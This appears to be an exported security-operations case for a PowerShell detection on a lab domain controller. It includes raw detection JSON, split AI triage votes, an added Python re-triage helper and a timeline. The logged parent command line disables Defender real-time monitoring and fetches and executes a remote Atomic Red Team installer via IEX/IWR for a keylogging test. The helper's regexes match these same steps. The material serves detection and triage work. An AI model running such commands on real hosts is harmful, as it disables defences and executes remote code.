Severity: high · Status: closed · Verdict: suspicious

๐Ÿท๏ธ Analyst Verdict Classification

SUSPICIOUS by analyst

🤖 AI Analysis

🔔 Detections (1)

Malicious PowerShell Commandlets - ProcessCreation high
Rule: service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 96% · Verdict: suspicious
Event Data:
COMMAND_LINE:
"powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"") {exit 0} else {exit 1}}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
9152
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1
MITRE: T1056.001 T1562.001
📄 Raw Detection JSON
{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "Malicious PowerShell Commandlets - ProcessCreation",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"powershell.exe\" \u0026 {if (Test-Path \\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\") {exit 0} else {exit 1}}",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 40960,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 9152,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
      "event_time": 1774364762714,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1224,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "de7904f7b26fa572efe4a73369c2a85b"
    }
  },
  "detect_id": "414ce72d-935e-4763-a1d8-051c69c2a85b",
  "detect_mtd": {
    "author": "Nasreddine Bencherchali (Nextron Systems)",
    "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
    "falsepositives": [
      "Unknown"
    ],
    "level": "high",
    "references": [
      "https://adsecurity.org/?p=2921",
      "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
      "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
      "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
      "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
      "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
      "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
      "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
      "https://github.com/calebstewart/CVE-2021-1675",
      "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
      "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
      "https://github.com/HarmJ0y/DAMP",
      "https://github.com/samratashok/nishang",
      "https://github.com/DarkCoderSc/PowerRunAsSystem/",
      "https://github.com/besimorhino/powercat",
      "https://github.com/Kevin-Robertson/Powermad",
      "https://github.com/adrecon/ADRecon",
      "https://github.com/adrecon/AzureADRecon",
      "https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1",
      "https://github.com/The-Viper-One/Invoke-PowerDPAPI/",
      "https://github.com/Arno0x/DNSExfiltrator/"
    ],
    "tags": [
      "attack.execution",
      "attack.discovery",
      "attack.t1482",
      "attack.t1087",
      "attack.t1087.001",
      "attack.t1087.002",
      "attack.t1069.001",
      "attack.t1069.002",
      "attack.t1069",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364763945,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=de7904f7b26fa572efe4a73369c2a85b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
    "event_time": 1774364762714,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1224,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "de7904f7b26fa572efe4a73369c2a85b"
  },
  "rule_tags": [
    "attack.execution",
    "attack.t1482",
    "attack.t1087",
    "attack.t1087.002",
    "ext:ext-sigma",
    "attack.discovery",
    "attack.t1087.001",
    "attack.t1069.001",
    "attack.t1069.002",
    "attack.t1069",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets",
  "ts": 1774364764000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.965,
  "false_positive_reason": "Authorized security testing / Malicious activity simulation",
  "investigation_questions": [
    "Was this host part of a scheduled detection validation exercise?",
    "Who is the owner of the NT AUTHORITY\\SYSTEM session that executed the parent installation script?"
  ],
  "ioc_analysis": "The PowerShell binary (powershell.exe) is a signed Microsoft system component running from its standard location. The command line arguments and file paths (\u0027C:\\AtomicRedTeam\\...\u0027) are characteristic of the Atomic Red Team testing framework, indicating a simulated attack rather than a malicious actor.",
  "iocs_extracted": [
    "C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1"
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1562.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Verify with the security team if Atomic Red Team testing was scheduled for this host.",
    "If unauthorized, investigate the user who initiated the Atomic Red Team installation.",
    "Re-enable Windows Defender Real-time Monitoring if the test has concluded."
  ],
  "risk_score": 12,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** benign | **Confidence:** 0.98\nThe detection triggered on a PowerShell process checking for the existence of an Atomic Red Team (ART) script. The command line and its parent process are explicitly performing authorized security testing via the Invoke-AtomicRedTeam framework for MITRE ATT\u0026CK technique T1056.001 (Input Capture: Keylogging).\n\n**IOC Analysis:** The PowerShell binary (powershell.exe) is a signed Microsoft system component running from its standard location. The command line arguments and file paths (\u0027C:\\AtomicRedTeam\\...\u0027) are characteristic of the Atomic Red Team testing framework, indicating a simulated attack rather than a malicious actor.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThis event is a false positive because the malicious commandlet detection rule triggered on a legitimate Windows system binary (powershell.exe) running from its expected location in System32 under the SYSTEM user context. The process tree shows this PowerShell instance was spawned by another PowerShell process executing Atomic Red Team installation scripts, which is a known security testing framework.\n\n**IOC Analysis:** The IOCs are benign because powershell.exe is a legitimate Microsoft-signed binary located at C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe with the correct hash (de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c). The command line contains Atomic Red Team testing scripts, which are legitimate security assessment tools. The parent process shows PowerShell executing installation commands for Atomic Red Team, indicating this is a controlled security test environment rather than an attack.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\nFailed or timed out.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "gemini-cli: benign (low, 98% confidence)",
      "qwen3.5:4b: false_positive (high, 95% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.98,
        "model": "gemini-cli",
        "verdict": "benign"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "false_positive"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}
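Added example, not from the FusionSOC case, LimaCharlie or Atomic Red Team: a small Python triage helper that re-scores this detection by walking the embedded parent chain and matching what each command line actually does, instead of stopping at the `C:\AtomicRedTeam` marker that both model votes treated as proof of a benign test. The `EVENT` dict is a trimmed copy of the detection event on this page (command lines verbatim) and the sensor tags come from its routing block; the pattern table, the verdict labels and the "SYSTEM on a domain controller" rule are this example's own assumptions. Run as written it returns `suspicious`, matching the analyst's closing classification, because the parent PowerShell disabled Defender real-time monitoring (T1562.001) as NT AUTHORITY\SYSTEM on a sensor tagged `domain-controller`, which is also why the recommended actions include re-enabling it once the test is over.

```python
"""Re-triage a LimaCharlie NEW_PROCESS detection by scoring the whole parent
chain. Added example, not part of the FusionSOC case or of LimaCharlie."""
import re

# Trimmed copy of the page's detection event (COMMAND_LINE values verbatim).
EVENT = {
    "PROCESS_ID": 9152,
    "USER_NAME": r"NT AUTHORITY\SYSTEM",
    "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "COMMAND_LINE": (
        r'"powershell.exe" & {if (Test-Path \""C:\AtomicRedTeam\atomics'
        r'\T1056.001\src\Get-Keystrokes.ps1\"") {exit 0} else {exit 1}}'
    ),
    "PARENT": {
        "PROCESS_ID": 3164,
        "USER_NAME": r"NT AUTHORITY\SYSTEM",
        "FILE_PATH": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "COMMAND_LINE": (
            "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; "
            "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; "
            "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; "
            "Set-MpPreference -DisableRealtimeMonitoring $true ; "
            "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/"
            "master/install-atomicredteam.ps1' -UseBasicParsing) ; "
            "Install-AtomicRedTeam -Force -getAtomics; "
            "Invoke-AtomicTest T1056.001 -CheckPrereqs ; "
            "Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 "
        ),
    },
}
# Sensor tags taken from the page's routing block.
ROUTING_TAGS = ["domain-controller", "fusion-soc-alert"]

# Assumed pattern table: (label, ATT&CK id or None, regex). The ids are the
# ones the page itself maps; the download cradle is deliberately left untagged.
PATTERNS = [
    ("defender_realtime_disabled", "T1562.001",
     r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true"),
    ("execution_policy_unrestricted", "T1059.001",
     r"Set-ExecutionPolicy\s+Unrestricted"),
    ("download_cradle", None, r"\bIEX\s*\(\s*IWR\b"),
    ("keylogger_cmdlet_reference", "T1056.001", r"Get-Keystrokes"),
]
ART_MARKER = re.compile(r"C:\\AtomicRedTeam\\|Invoke-AtomicTest|Install-AtomicRedTeam")
HIGH_VALUE_TAGS = {"domain-controller"}  # assumed host-criticality tag


def walk_chain(event):
    """Yield the process and every ancestor the sensor embedded, child first."""
    node = event
    while node is not None:
        yield node
        node = node.get("PARENT")


def scan_cmdline(cmdline):
    """Return the (label, technique) pairs whose regex matches the command line."""
    return [(label, tid) for label, tid, rx in PATTERNS
            if re.search(rx, cmdline, re.IGNORECASE)]


def triage(event, tags):
    """Score the whole process chain; return a verdict plus the evidence behind it."""
    per_process = {p["PROCESS_ID"]: scan_cmdline(p["COMMAND_LINE"])
                   for p in walk_chain(event)}
    labels = {lab for hits in per_process.values() for lab, _ in hits}
    techniques = sorted({tid for hits in per_process.values() for _, tid in hits if tid})
    art_test = any(ART_MARKER.search(p["COMMAND_LINE"]) for p in walk_chain(event))
    as_system = any(p["USER_NAME"].upper().endswith("SYSTEM") for p in walk_chain(event))
    on_high_value_host = bool(HIGH_VALUE_TAGS & set(tags))

    # The ART marker explains the keylogger reference, but it does not make
    # "Defender off, as SYSTEM, on a domain controller" safe to auto-close:
    # the run may be unscheduled, and real-time monitoring stays off afterwards.
    if "defender_realtime_disabled" in labels or (as_system and on_high_value_host):
        verdict = "suspicious"
    elif art_test:
        verdict = "likely_authorized_test"
    else:
        verdict = "needs_review"

    follow_up = []
    if art_test:
        follow_up.append("confirm the Atomic Red Team run was scheduled for this host")
    if "defender_realtime_disabled" in labels:
        follow_up.append("verify real-time monitoring was re-enabled after the test")
    return {"verdict": verdict, "techniques": techniques, "art_test": art_test,
            "chain": per_process, "follow_up": follow_up}


if __name__ == "__main__":
    result = triage(EVENT, ROUTING_TAGS)
    print(result["verdict"], result["techniques"])
    for pid, hits in result["chain"].items():
        print(pid, [lab for lab, _ in hits])
    for item in result["follow_up"]:
        print("follow-up:", item)
```

The per-process breakdown is the part worth keeping in a case note: the child (PID 9152) only runs a `Test-Path` prerequisite check and is harmless on its own; every defense-evasion and download indicator sits in the parent (PID 3164), which is exactly the context the two model votes summarised away as "ART installation".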

โš™๏ธ Response Actions

Action | Target | Status | Result
tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found
recommended | Verify with the security team if Atomic Red Team testing was scheduled for this host. | executed | General Activity Sweep: 0 events found
recommended | If unauthorized, investigate the user who initiated the Atomic Red Team installation. | executed | User Activity Investigation: 32 events found
recommended | Re-enable Windows Defender Real-time Monitoring if the test has concluded. | executed | General Activity Sweep: 0 events found

๐Ÿ“ Add Note

💬 Notes (5)

🤖 FusionSOC AI 2026-03-24T15:34
🤖 FusionSOC AI 2026-03-24T15:34
🤖 FusionSOC AI 2026-03-24T15:34
🤖 FusionSOC AI 2026-03-24T15:34
🤖 FusionSOC AI 2026-03-24T15:34

📜 Timeline

2026-03-24T17:30:27
analyst
Status changed: investigating → closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:34:18
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:34:18
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:34:18
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Re-enable Windows Defender Real-time Monitoring if the test has concluded. **Sen...
2026-03-24T15:34:18
FusionSOC
Response action queued: recommended on Re-enable Windows Defender Real-time Monitoring if the test has concluded.
2026-03-24T15:34:18
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:34:18
FusionSOC
Action recommended → executed: User Activity Investigation: 32 events found
2026-03-24T15:34:18
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” User Activity Investigation **Action:** If unauthorized, investigate the user who initiated the Atomic Red Team ins...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on If unauthorized, investigate the user who initiated the Atomic Red Team installation.
2026-03-24T15:34:17
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:34:17
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:34:17
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Verify with the security team if Atomic Red Team testing was scheduled for this ...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on Verify with the security team if Atomic Red Team testing was scheduled for this host.
2026-03-24T15:34:17
FusionSOC AI
Status changed: open → investigating
2026-03-24T15:34:17
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:34:17
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Manual analyst review required โ€” AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:34:17
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T15:34:17
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:34:17
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:34:16
FusionSOC AI
Detection 414ce72d-935e-4763-a1d8-051c69c2a85b triaged as suspicious (high severity, confidence: 96%)
2026-03-24T15:34:16
FusionSOC AI
Case created from detection: service.windows_process_creation/proc_creation_win_powershell_malicious_cmdlets